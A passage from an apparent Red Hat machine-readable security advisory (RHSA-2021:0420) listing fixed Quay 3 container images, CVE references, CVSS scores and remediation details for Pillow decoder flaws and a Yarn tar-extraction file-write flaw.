"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", 
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-5312" }, { "category": "external", "summary": "RHBZ#1789533", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789533" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-5312", "url": "https://www.cve.org/CVERecord?id=CVE-2020-5312" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5312", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5312" } ], "release_date": "2020-01-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", 
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", 
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c" }, { "cve": "CVE-2020-5313", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2020-01-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1789532" } ], "notes": [ { "category": "description", "text": "An out-of-bounds read was discovered in python-pillow in the way it decodes FLI images. An application that uses python-pillow to load untrusted images may be vulnerable to this flaw, which can allow an attacker to read memory of the application that they should not be allowed to read.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-5313" }, { "category": "external", "summary": "RHBZ#1789532", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789532" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-5313", "url": "https://www.cve.org/CVERecord?id=CVE-2020-5313" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5313", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5313" } ], "release_date": "2020-01-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer 
to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1" }, "products": [ 
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images" }, { "cve": "CVE-2020-8131", "cwe": { "id": "CWE-77", "name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)" }, "discovery_date": "2020-02-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1816261" } ], "notes": [ { "category": "description", "text": "An arbitrary file write flaw was found in Yarn. 
This flaw allows an attacker to write files to a user\u2019s system in unexpected places, potentially leading to remote code execution. The attacker would need to first trick a developer into installing a malicious package.", "title": "Vulnerability description" }, { "category": "summary", "text": "yarn: Arbitrary filesystem write via tar expansion", "title": "Vulnerability summary" }, { "category": "other", "text": "Normally yarn allows packages to run postinstall scripts, which can write arbitrary files to the user\u0027s system. This vulnerability allows an attacker to better hide the attack and also allows arbitrary file writes when postinstall scripts are disabled with the \u0027--ignore-scripts\u0027 option of \u0027yarn install\u0027.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", 
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8131" }, { "category": "external", "summary": "RHBZ#1816261", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1816261" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8131", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8131" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8131", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8131" } ], "release_date": "2020-02-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", 
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "yarn: Arbitrary filesystem write via tar expansion" }, { "cve": "CVE-2020-10177", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2020-06-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1852824" } ], "notes": [ { "category": "description", "text": "A flaw was found in python-pillow. 
Multiple out-of-bounds reads occur in libImaging/FliDecode.c.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", 
"url": "https://access.redhat.com/security/cve/CVE-2020-10177" }, { "category": "external", "summary": "RHBZ#1852824", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852824" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-10177", "url": "https://www.cve.org/CVERecord?id=CVE-2020-10177" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10177", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10177" } ], "release_date": "2020-06-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", 
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", 
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c" }, { "cve": "CVE-2020-10378", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2020-06-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1852832" } ], "notes": [ { "category": "description", "text": "A flaw was found in python-pillow. In libImaging/PcxDecode.c, an out-of-bounds read occurs when reading PCX files where state-\u003eshuffle is instructed to read beyond state-\u003ebuffer.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 